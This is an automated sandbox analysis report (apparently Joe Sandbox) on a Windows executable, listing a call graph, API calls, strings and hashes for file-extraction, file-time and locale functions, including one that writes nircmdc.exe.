15327->15329 15328 404044 15333 413326 ___free_lc_time 7 API calls 15328->15333 15352 403f92 15329->15352 15330 412920 26 API calls 15330->15337 15348 412920 26 API calls 15331->15348 15332->15326 15332->15328 15333->15337 15335 404193 15334->15335 15336 404166 15334->15336 15339 4041b3 15335->15339 15340 404197 15335->15340 15342 412920 26 API calls 15336->15342 15337->15316 15337->15318 15337->15330 15345 4041e2 15339->15345 15351 4041c7 15339->15351 15344 412920 26 API calls 15340->15344 15341 413326 ___free_lc_time 7 API calls 15341->15346 15359 40418e 15342->15359 15343->15347 15350 412920 26 API calls 15343->15350 15344->15359 15357 412920 26 API calls 15345->15357 15346->15310 15346->15341 15348->15323 15349 413326 ___free_lc_time 7 API calls 15349->15354 15350->15347 15355 412920 26 API calls 15351->15355 15352->15310 15356 412920 26 API calls 15352->15356 15353 412920 26 API calls 15353->15354 15354->15327 15354->15349 15354->15353 15365 40ff00 15354->15365 15355->15359 15356->15310 15357->15359 15358 40424c 15358->15347 15361 412920 26 API calls 15358->15361 15359->15358 15360 412920 26 API calls 15359->15360 15360->15358 15361->15347 15399 40b620 15362->15399 15364 40b515 15364->15314 15366 40f6b0 GetVersion 15365->15366 15367 40ff05 15366->15367 15368 40ff09 15367->15368 15369 40ff0a CreateFileA 15367->15369 15368->15354 15370 40ff3b 15369->15370 15391 40fffa 15369->15391 15372 40ff64 15370->15372 15374 406640 3 API calls 15370->15374 15371 41004a 15373 406640 3 API calls 15371->15373 15375 40f980 70 API calls 15372->15375 15378 41005a GetLastError 15373->15378 15379 40ff54 15374->15379 15380 40ff93 15375->15380 15376 41011e CloseHandle 15377 410074 15376->15377 15377->15354 15381 412920 26 API calls 15378->15381 15382 412920 26 API calls 15379->15382 15383 410013 15380->15383 15384 40ffa2 15380->15384 15381->15377 15382->15372 15388 412920 26 API calls 15383->15388 15383->15391 15385 40ffc6 15384->15385 15386 406640 3 API calls 15384->15386 15387 412920 26 API calls 15385->15387 15389 40ffb6 15386->15389 15387->15391 15388->15391 15392 412920 26 API calls 15389->15392 15390 41009f 15390->15376 15393 4100c7 SetFileTime 15390->15393 15391->15371 15391->15390 15392->15385 15393->15376 15394 4100d5 GetLastError 15393->15394 15395 406640 3 API calls 15394->15395 15396 4100eb 15395->15396 15397 412920 26 API calls 15396->15397 15398 4100fe 15397->15398 15398->15376 15400 4068d0 6 API calls 15399->15400 15401 40b62f 15400->15401 15401->15364 15107 404ab2 15108 404ab6 15107->15108 15109 404abd 15108->15109 15117 404ae4 15108->15117 15110 406640 3 API calls 15109->15110 15132 404ad6 15110->15132 15111 404c58 15114 407860 51 API calls 15111->15114 15112 412920 26 API calls 15153 404713 15112->15153 15113 413326 ___free_lc_time 7 API calls 15113->15111 15116 404c79 15114->15116 15115 404bc2 15118 406640 3 API calls 15115->15118 15134 404c22 15115->15134 15120 404cb2 15116->15120 15126 404c8b 15116->15126 15117->15115 15121 406640 3 API calls 15117->15121 15136 404b69 15117->15136 15122 404c0f 15118->15122 15119 413326 ___free_lc_time 7 API calls 15119->15115 15161 404d81 15120->15161 15229 402450 15120->15229 15123 404b3f 15121->15123 15124 412920 26 API calls 15122->15124 15127 406640 3 API calls 15123->15127 15124->15134 15130 406640 3 API calls 15126->15130 15131 404b56 15127->15131 15128 404ccd 15135 404cd8 15128->15135 15128->15161 15129 4051c2 15130->15132 15133 412920 26 API calls 15131->15133 15132->15112 15133->15136 15134->15111 15134->15113 15137 404d3b 15135->15137 15138 404cdd 15135->15138 15136->15119 15139 406640 3 API calls 15137->15139 15143 406640 3 API calls 15138->15143 15138->15153 15142 404d55 15139->15142 15140 41908b 2 API calls 15140->15153 15144 412920 26 API calls 15142->15144 15146 404d09 15143->15146 15144->15153 15145 41b5e5 6 API calls 15145->15153 15148 412920 26 API calls 15146->15148 15147 405099 15150 4050a0 15147->15150 15151 405113 15147->15151 15148->15153 15260 40fde0 15150->15260 15151->15153 15156 406640 3 API calls 15151->15156 15153->15129 15153->15140 15153->15145 15155 4068d0 6 API calls 15153->15155 15159 412920 26 API calls 15153->15159 15154 4050aa 15154->15153 15157 412920 26 API calls 15154->15157 15155->15153 15156->15132 15157->15153 15158 406640 CharToOemA MultiByteToWideChar MultiByteToWideChar 15158->15161 15159->15153 15160 412920 26 API calls 15160->15161 15161->15147 15161->15153 15161->15158 15161->15160 15163 405063 OemToCharA 15161->15163 15164 4109d0 15161->15164 15249 4077c0 15161->15249 15256 407d60 15161->15256 15163->15161 15167 4109f6 15164->15167 15165 410a69 15166 411170 103 API calls 15165->15166 15170 410b0a 15166->15170 15167->15165 15168 41338f 6 API calls 15167->15168 15168->15165 15169 407d60 2 API calls 15171 410d81 15169->15171 15173 41338f 6 API calls 15170->15173 15175 411100 36 API calls 15170->15175 15178 413755 2 API calls 15170->15178 15180 410d17 15170->15180 15212 411170 103 API calls 15170->15212 15216 410d48 15170->15216 15218 411073 15170->15218 15271 411120 15170->15271 15174 410d8f 15171->15174 15196 410ede 15171->15196 15173->15170 15176 411170 103 API calls 15174->15176 15175->15170 15177 410d9b 15176->15177 15181 410e61 15177->15181 15182 410dab 15177->15182 15178->15170 15179 411120 78 API calls 15183 410f38 15179->15183 15200 406640 3 API calls 15180->15200 15180->15216 15185 410ecb 15181->15185 15193 410e76 SetFileAttributesA 15181->15193 15184 410dd5 15182->15184 15188 406640 3 API calls 15182->15188 15186 410f43 15183->15186 15187 410f8e 15183->15187 15190 410df9 SetFileAttributesA 15184->15190 15191 410e4e 15184->15191 15185->15161 15192 406640 3 API calls 15186->15192 15194 411170 103 API calls 15187->15194 15195 410dc5 15188->15195 15189 41338f 6 API calls 15189->15196 15190->15191 15198 410e0c 15190->15198 15191->15161 15199 410f54 15192->15199 15193->15185 15201 410e89 15193->15201 15202 410f9a 15194->15202 15203 412920 26 API calls 15195->15203 15196->15189 15197 410f26 15196->15197 15197->15179 15204 406640 3 API calls 15198->15204 15205 412920 26 API calls 15199->15205 15206 410d38 15200->15206 15207 406640 3 API calls 15201->15207 15208 411170 103 API calls 15202->15208 15203->15184 15209 410e1d GetLastError 15204->15209 15210 410f64 15205->15210 15211 412920 26 API calls 15206->15211 15213 410e9a GetLastError 15207->15213 15214 410fa6 15208->15214 15215 412920 26 API calls 15209->15215 15210->15161 15211->15216 15212->15170 15217 412920 26 API calls 15213->15217 15214->15218 15221 411020 SetVolumeLabelA 15214->15221 15223 406640 3 API calls 15214->15223 15219 410e37 15215->15219 15216->15169 15220 410eb4 15217->15220 15218->15161 15219->15191 15220->15185 15221->15185 15222 411038 15221->15222 15224 412920 26 API calls 15222->15224 15225 410ff4 15223->15225 15226 411049 15224->15226 15227 412920 26 API calls 15225->15227 15226->15161 15228 411009 15227->15228 15228->15221 15230 40246a 15229->15230 15233 4024ad 15230->15233 15274 4069c0 15230->15274 15232 4024f5 15234 402563 15232->15234 15235 40253e 15232->15235 15244 402504 15232->15244 15233->15232 15236 4024e0 15233->15236 15237 402559 15233->15237 15239 413274 12 API calls 15234->15239 15281 402660 15235->15281 15236->15235 15242 413274 12 API calls 15236->15242 15237->15234 15240 413326 ___free_lc_time 7 API calls 15237->15240 15241 402548 15239->15241 15240->15234 15243 40254f 15241->15243 15245 402634 15241->15245 15248 402660 21 API calls 15241->15248 15242->15232 15243->15128 15244->15128 15246 413326 ___free_lc_time 7 API calls 15245->15246 15247 40263f 15246->15247 15247->15128 15248->15241 15250 411df0 89 API calls 15249->15250 15252 4077d2 15250->15252 15251 4077d9 15251->15161 15252->15251 15253 407814 15252->15253 15254 407730 55 API calls 15252->15254 15253->15161 15255 40784a 15254->15255 15255->15161 15257 407d90 15256->15257 15258 407d6e 15256->15258 15257->15161 15258->15257 15259 413755 2 API calls 15258->15259 15259->15258 15261 40f6b0 GetVersion 15260->15261 15262 40fdea 15261->15262 15263 40fdee 15262->15263 15264 40fe26 15262->15264 15265 40fac0 GetVersion 15262->15265 15263->15154 15266 413274 12 API calls 15264->15266 15265->15264 15268 40fe59 15266->15268 15267 40fe68 15267->15154 15268->15267 15269 40fb60 71 API calls 15268->15269 15270 40fee2 15269->15270 15270->15154 15272 41c29c 78 API calls 15271->15272 15273 411130 15272->15273 15273->15170 15275 4069d3 15274->15275 15276 4069cd 15274->15276 15277 4069dc 15275->15277 15278 41b5e5 6 API calls 15275->15278 15276->15230 15277->15230 15279 406a11 15278->15279 15279->15277 15280 413825 3 API calls 15279->15280 15280->15277 15282 402673 15281->15282 15283 413274 12 API calls 15282->15283 15291 4026df 15282->15291 15284 402691 15283->15284 15285 4026a1 CharToOemA 15284->15285 15286 40269a 15284->15286 15287 4026b6 15285->15287 15286->15241 15288 4026d4 15287->15288 15289 4026bf OemToCharA 15287->15289 15290 413326 ___free_lc_time 7 API calls 15288->15290 15289->15288 15290->15291 15291->15241

                                          Executed Functions

                                          Function 0041C29C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230timefileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 298 41c29c-41c2ba call 41cb10 301 41c2bc-41c2c2 298->301 302 41c2cf-41c2df 298->302 304 41c2f3 call 41ca52 301->304 305 41c2c4-41c2c8 301->305 303 41c54a-41c54e 302->303 310 41c2f8-41c311 FindFirstFileA 304->310 307 41c2e4-41c2f1 call 41ca95 305->307 308 41c2ca-41c2cd 305->308 307->310 308->302 308->307 312 41c317-41c326 call 41cb10 310->312 313 41c3be-41c3d1 FileTimeToLocalFileTime 310->313 321 41c3ac-41c3b9 312->321 322 41c32c-41c345 call 41c9af 312->322 315 41c532-41c542 GetLastError call 419c07 FindClose 313->315 316 41c3d7-41c3e7 FileTimeToSystemTime 313->316 324 41c548 315->324 316->315 319 41c3ed-41c420 call 419a07 316->319 328 41c422-41c428 319->328 329 41c42a-41c43d FileTimeToLocalFileTime 319->329 321->324 322->321 330 41c347-41c351 call 4157c0 322->330 324->303 328->329 331 41c480-41c489 328->331 329->315 332 41c443-41c453 FileTimeToSystemTime 329->332 341 41c353-41c35c call 41c54f 330->341 342 41c35e-41c368 GetDriveTypeA 330->342 334 41c498-41c4ab FileTimeToLocalFileTime 331->334 335 41c48b-41c491 331->335 332->315 333 41c459-41c47d call 419a07 332->333 333->331 334->315 339 41c4b1-41c4c1 FileTimeToSystemTime 334->339 335->334 338 41c493-41c496 335->338 344 41c4ea-41c4f0 FindClose 338->344 339->315 345 41c4c3-41c4e7 call 419a07 339->345 341->321 341->342 342->321 347 41c36a-41c3a7 call 419a07 342->347 349 41c4f6-41c530 call 41c1e4 344->349 345->344 347->349 349->303
                                          APIs
                                          • FindFirstFileA.KERNELBASE(00000000,?,?,?,00000001), ref: 0041C303
                                          • GetDriveTypeA.KERNEL32(00000000), ref: 0041C35F
                                          • FileTimeToLocalFileTime.KERNEL32(?,00000000), ref: 0041C3C9
                                          • FileTimeToSystemTime.KERNEL32(00000000,?), ref: 0041C3DF
                                          • FileTimeToLocalFileTime.KERNEL32(?,00000000), ref: 0041C435
                                          • FileTimeToSystemTime.KERNEL32(00000000,?), ref: 0041C44B
                                          • FileTimeToLocalFileTime.KERNEL32(?,00000000), ref: 0041C4A3
                                          • FileTimeToSystemTime.KERNEL32(00000000,?), ref: 0041C4B9
                                          • FindClose.KERNELBASE(?), ref: 0041C4F0
                                          • GetLastError.KERNEL32 ref: 0041C532
                                          • FindClose.KERNEL32(?), ref: 0041C542
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Time$File$FindLocalSystem$Close$DriveErrorFirstLastType
                                          • String ID: ./\
                                          • API String ID: 816071114-3176372042
                                          • Opcode ID: de69cfd65508da5e28b4097bf2a6a8e8f7020ae88d7c1538e3f84fae5ecebbca
                                          • Instruction ID: a4bf26b3288f0746aeaefe6eee33eeb9c95b8158a33583b504b7627764fa2a0b
                                          • Opcode Fuzzy Hash: de69cfd65508da5e28b4097bf2a6a8e8f7020ae88d7c1538e3f84fae5ecebbca
                                          • Instruction Fuzzy Hash: 3A815D72940229AACB20DFA5DC85AEFB7FCBF08341F00446BF555E2141E73C9A84CB69
                                          Function 00416AF5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 116COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 454 416af5-416b00 455 416b21-416b27 454->455 456 416b02-416b09 call 417226 454->456 458 416bad call 417125 455->458 459 416b2d-416b35 455->459 464 416b17 456->464 465 416b0b-416b15 456->465 469 416bb2-416bb8 458->469 461 416b37-416b48 call 416c72 459->461 462 416b4b-416b55 459->462 461->462 467 416b74-416b82 462->467 468 416b57-416b59 462->468 464->455 465->455 474 416b84-416b86 467->474 475 416b9e-416ba0 467->475 468->467 473 416b5b-416b71 call 416c72 468->473 470 416c6c 469->470 471 416bbe-416bc5 call 41713f 469->471 480 416c6e-416c71 470->480 483 416bca-416bcf 471->483 473->467 474->475 476 416b88-416b8a 474->476 475->458 478 416ba2-416ba4 475->478 481 416b97-416b9c call 416f55 476->481 482 416b8c-416b8e 476->482 478->458 484 416ba6-416bab call 417068 478->484 481->469 482->481 486 416b90-416b95 call 416cca 482->486 483->470 487 416bd5-416be1 IsValidCodePage 483->487 484->469 486->469 487->470 491 416be7-416bf7 IsValidLocale 487->491 491->470 495 416bf9-416bff 491->495 496 416c01-416c16 495->496 497 416c1a-416c20 495->497 496->497 498 416c22-416c38 GetLocaleInfoA 497->498 499 416c67-416c6a 497->499 498->470 500 416c3a-416c53 GetLocaleInfoA 498->500 499->480 500->470 501 416c55-416c64 call 41a8c2 500->501 501->499
                                          APIs
                                          • IsValidCodePage.KERNEL32(00000000,004259A8,?,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00416BD9
                                          • IsValidLocale.KERNEL32(00000001,?,00000000), ref: 00416BEF
                                          • GetLocaleInfoA.KERNEL32(00001001,?,00000040,?,00000000), ref: 00416C30
                                          • GetLocaleInfoA.KERNEL32(00001002,?,00000040,?,00000000), ref: 00416C4B
                                            • Part of subcall function 00417226: GetVersionExA.KERNEL32(?), ref: 00417240
                                            • Part of subcall function 00417068: EnumSystemLocalesA.KERNEL32(0041709F,00000001,004259A8,?,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00417088
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Locale$InfoValid$CodeEnumLocalesPageSystemVersion
                                          • String ID: l-B$|1B
                                          • API String ID: 4087412349-1682926205
                                          • Opcode ID: 14451e5f9ff0b11f7926cd449961003fc9334d28c4f7d9c07cbd2b1cfb64d6f8
                                          • Instruction ID: 77c45fc4a99a2d4965105fa733fd9383233311c3507932e8642f778f9422cabb
                                          • Opcode Fuzzy Hash: 14451e5f9ff0b11f7926cd449961003fc9334d28c4f7d9c07cbd2b1cfb64d6f8
                                          • Instruction Fuzzy Hash: C131F6717052609BD7309F61AC81AAB3AA5EB00704F5B403FE540D7391EABEE8C9C75D
                                          Function 004194BD Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 196timeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 504 4194bd-4194ea call 4131f7 507 4194f0-4194fd GetTimeZoneInformation 504->507 508 4195e6-4195e9 504->508 509 419715-41971a 507->509 511 419503-419526 507->511 508->509 510 4195ef-4195f6 508->510 512 419609-41962b call 413326 call 4157c0 call 413274 510->512 513 4195f8-419603 call 4165c0 510->513 514 419534-41953b 511->514 515 419528-41952f 511->515 512->509 535 419631-419658 call 4166d0 call 4140c0 512->535 513->509 513->512 517 419558-41955e 514->517 518 41953d-419544 514->518 515->514 522 419564-41958e WideCharToMultiByte 517->522 518->517 521 419546-419556 518->521 521->522 525 4195a1-4195a6 522->525 526 419590-419594 522->526 529 4195a9-4195c8 WideCharToMultiByte 525->529 526->525 528 419596-41959f 526->528 528->529 531 41970d-419712 529->531 532 4195ce-4195d2 529->532 531->509 532->531 534 4195d8-4195e1 532->534 534->509 540 41965a-41965d 535->540 541 41965e-41966f call 41aa8d 535->541 540->541 544 419675-419679 541->544 545 419683-419684 544->545 546 41967b-41967d 544->546 545->544 547 419686-419689 546->547 548 41967f-419681 546->548 549 4196d9-4196db 547->549 550 41968b-41969e call 41aa8d 547->550 548->545 548->547 551 4196e5-4196ef 549->551 552 4196dd-4196df 549->552 557 4196a4-4196a8 550->557 551->531 554 4196f1-41970b call 4140c0 551->554 552->551 554->509 559 4196b1-4196b4 557->559 560 4196aa-4196ac 557->560 559->549 562 4196b6-4196c6 call 41aa8d 559->562 560->559 561 4196ae-4196af 560->561 561->557 565 4196cc-4196d0 562->565 565->549 566 4196d2-4196d4 565->566 566->549 567 4196d6-4196d7 566->567 567->565
                                          APIs
                                          • GetTimeZoneInformation.KERNELBASE(00428F08,00000000,00000000,00000001,00000000,?,0040A354,?,00000000,?,?,?,?,0040144E), ref: 004194F5
                                          • WideCharToMultiByte.KERNEL32(00000220,Eastern Standard Time,00000000,0000003F,00000000,?,?,0040A354,?,00000000,?,?,?,?,0040144E), ref: 0041958A
                                          • WideCharToMultiByte.KERNEL32(00000220,Eastern Summer Time,00000000,0000003F,00000000,?,?,0040A354,?,00000000,?,?,?,?,0040144E), ref: 004195C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$InformationTimeZone
                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                          • API String ID: 1904278450-239921721
                                          • Opcode ID: c9d78c50aff07665b13410a1bc301889d252633011d0570864fa1448f4cdbf1b
                                          • Instruction ID: d190c84c4cc0c26642eb153707845cbe8beff245003c06114f550f7d716fb191
                                          • Opcode Fuzzy Hash: c9d78c50aff07665b13410a1bc301889d252633011d0570864fa1448f4cdbf1b
                                          • Instruction Fuzzy Hash: 5561C1B1707250AFD7318F15AC61BAA7B9ABB45344F95003FE085872A5DF788CC2C66E
                                          Function 0041713F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoA.KERNELBASE(00001004,?,00000008,?,?,?,?,00416BCA,?,004259A8,?,00425924,0041303A,?,00428D8C,?), ref: 0041718E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: 4709dea30003b597f3d8250bd796ea7638c71e64de1883d2224e33a91a822167
                                          • Instruction ID: 903deaa607cf639364b7cc7254e85297317a472b98b4467e3dd4c96a9452e7fa
                                          • Opcode Fuzzy Hash: 4709dea30003b597f3d8250bd796ea7638c71e64de1883d2224e33a91a822167
                                          • Instruction Fuzzy Hash: 1CF0FC3264962439FB215751AC02FEB376C9F01751F50001FF940E52C1EB9C9BC5C29D
                                          Function 00413F9E Relevance: 4.6, APIs: 3, Instructions: 75timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocalTime.KERNEL32(00407739), ref: 00413FAB
                                          • GetSystemTime.KERNEL32(?), ref: 00413FB5
                                          • GetTimeZoneInformation.KERNELBASE(?), ref: 0041400A
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Time$InformationLocalSystemZone
                                          • String ID:
                                          • API String ID: 2475273158-0
                                          • Opcode ID: dca7f0237e856ea5404fbb126ca6f1160033c27d591cee985ea1f73d045f6dfd
                                          • Instruction ID: 63eaa413687e3a0af9faf97127154bf37a26255f9c7758cb6ae69d944a5b3749
                                          • Opcode Fuzzy Hash: dca7f0237e856ea5404fbb126ca6f1160033c27d591cee985ea1f73d045f6dfd
                                          • Instruction Fuzzy Hash: 46218E39901015E9CB21AB9AD804AFF7BB9BB4C754F800416FA10E7294E7BD8DC6C76C
                                          Function 0040F740 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 180filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 255 40f740-40f75b call 4144da 258 40f761-40f7aa call 40fb60 CreateFileA 255->258 259 40f974-40f97a 255->259 262 40f7ea-40f7f1 258->262 263 40f7ac-40f7bd SetFileAttributesA 258->263 265 40f7f7-40f819 call 40fac0 262->265 266 40f8ce-40f8d1 262->266 263->262 264 40f7bf-40f7e7 GetLastError call 412920 263->264 264->262 265->266 278 40f81f-40f843 call 40f980 265->278 267 40f8d3-40f904 GetLastError call 412920 266->267 268 40f905-40f907 266->268 272 40f909-40f941 SetFileTime 268->272 273 40f96d-40f96e CloseHandle 268->273 272->273 277 40f943-40f96a GetLastError call 412920 272->277 273->259 277->273 278->266 285 40f849-40f850 278->285 286 40f852-40f896 call 406640 call 412920 285->286 287 40f898 285->287 286->287 290 40f89d-40f8cb call 412920 286->290 287->290 290->266
                                          APIs
                                          • CreateFileA.KERNELBASE(nircmdc.exe,40000000,00000002,00000000,00000003,00000080,00000000), ref: 0040F791
                                          • SetFileAttributesA.KERNEL32(nircmdc.exe,00000020), ref: 0040F7B5
                                          • GetLastError.KERNEL32(00000001), ref: 0040F7C1
                                          • GetLastError.KERNEL32(00000001), ref: 0040F8D5
                                          • SetFileTime.KERNELBASE(00000000,00000000,00000000,00000000), ref: 0040F939
                                          • GetLastError.KERNEL32(00000000), ref: 0040F944
                                          • CloseHandle.KERNEL32(00000000), ref: 0040F96E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ErrorFileLast$AttributesCloseCreateHandleTime
                                          • String ID: CreateFile() error %d when trying set file time$SetFileTime failed: %d$warning (%d): could not set file attributes$ compressed WinNT security data missing (%d bytes)%s$%-22s $nircmdc.exe
                                          • API String ID: 1520554102-3763623673
                                          • Opcode ID: 1ffbace52059439494c2faa23457c508adb197eeee7fbb6a1e74a0cc17ef8ed0
                                          • Instruction ID: ec123f940c35398d6c20d288b992aaa82a19b0590d8110fdc60b447adca6d815
                                          • Opcode Fuzzy Hash: 1ffbace52059439494c2faa23457c508adb197eeee7fbb6a1e74a0cc17ef8ed0
                                          • Instruction Fuzzy Hash: 1C51B671B402117BE720AB28BC47FB77359EB54B14F94453AF814E22C2F6B8AC18826D
                                          Function 0041AB18 Relevance: 13.7, APIs: 9, Instructions: 221COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 356 41ab18-41ab49 357 41ab8b-41ab90 356->357 358 41ab4b-41ab5e CompareStringW 356->358 361 41aba2-41aba5 357->361 362 41ab92-41ab9f call 4193b3 357->362 359 41ab60-41ab66 358->359 360 41ab68-41ab7b CompareStringA 358->360 359->357 363 41ad81 360->363 364 41ab81 360->364 366 41abb7-41abbf 361->366 367 41aba7-41abb4 call 4193b3 361->367 362->361 370 41ad83-41ad94 363->370 364->357 368 41abc1-41abd7 CompareStringA 366->368 369 41abdc-41abde 366->369 367->366 368->370 369->363 373 41abe4-41abe7 369->373 375 41abf1-41abf3 373->375 376 41abe9-41abee 373->376 377 41abf5-41abf8 375->377 378 41abfe-41ac01 375->378 376->375 377->378 379 41ac96-41acac MultiByteToWideChar 377->379 380 41ac03 378->380 381 41ac0b-41ac0e 378->381 379->363 385 41acb2-41ace8 call 41b280 379->385 382 41ac05-41ac06 380->382 383 41ac10-41ac12 381->383 384 41ac17-41ac19 381->384 382->370 383->370 386 41ac1b-41ac2a GetCPInfo 384->386 387 41ac5c-41ac5e 384->387 385->363 395 41acee-41ad06 MultiByteToWideChar 385->395 386->363 390 41ac30-41ac32 386->390 387->382 392 41ac60-41ac63 390->392 393 41ac34-41ac38 390->393 392->379 394 41ac65-41ac69 392->394 393->387 396 41ac3a-41ac40 393->396 394->383 398 41ac6b-41ac71 394->398 395->363 399 41ad08-41ad1e MultiByteToWideChar 395->399 396->387 397 41ac42-41ac47 396->397 397->387 400 41ac49-41ac50 397->400 398->383 401 41ac73-41ac78 398->401 399->363 402 41ad20-41ad52 call 41b280 399->402 404 41ac52-41ac54 400->404 405 41ac56-41ac5a 400->405 401->383 406 41ac7a-41ac81 401->406 402->363 412 41ad54-41ad69 MultiByteToWideChar 402->412 404->380 404->405 405->387 405->397 408 41ac83-41ac85 406->408 409 41ac8b-41ac8f 406->409 408->380 408->409 409->401 411 41ac91 409->411 411->383 412->363 413 41ad6b-41ad7f CompareStringW 412->413 413->370
                                          APIs
                                          • CompareStringW.KERNELBASE(00000000,00000000,004231C4,00000001,004231C4,00000001,00000000,020405B4,?,00000002,00428D60,004027DD,?,?,00000002,00428D60), ref: 0041AB56
                                          • CompareStringA.KERNEL32(00000000,00000000,004231C0,00000001,004231C0,00000001,?,00000002,00428D60,0040114F), ref: 0041AB73
                                          • CompareStringA.KERNEL32(?,?,00000000,0040114F,00428D60,00000002,00000000,020405B4,?,00000002,00428D60,004027DD,?,?,00000002,00428D60), ref: 0041ABD1
                                          • GetCPInfo.KERNEL32(?,00000000,00000000,020405B4,?,00000002,00428D60,004027DD,?,?,00000002,00428D60,0040114F), ref: 0041AC22
                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000002,00000000,00000000,?,00000002,00428D60,0040114F), ref: 0041ACA1
                                          • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000002,00000002,00000002,?,00000002,00428D60,0040114F), ref: 0041AD02
                                          • MultiByteToWideChar.KERNEL32(?,00000009,00428D60,00000002,00000000,00000000,?,00000002,00428D60,0040114F), ref: 0041AD15
                                          • MultiByteToWideChar.KERNEL32(?,00000001,00428D60,00000002,?,00000000,?,00000002,00428D60,0040114F), ref: 0041AD61
                                          • CompareStringW.KERNEL32(?,?,00000000,00000002,?,00000000,?,00000000,?,00000002,00428D60,0040114F), ref: 0041AD79
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
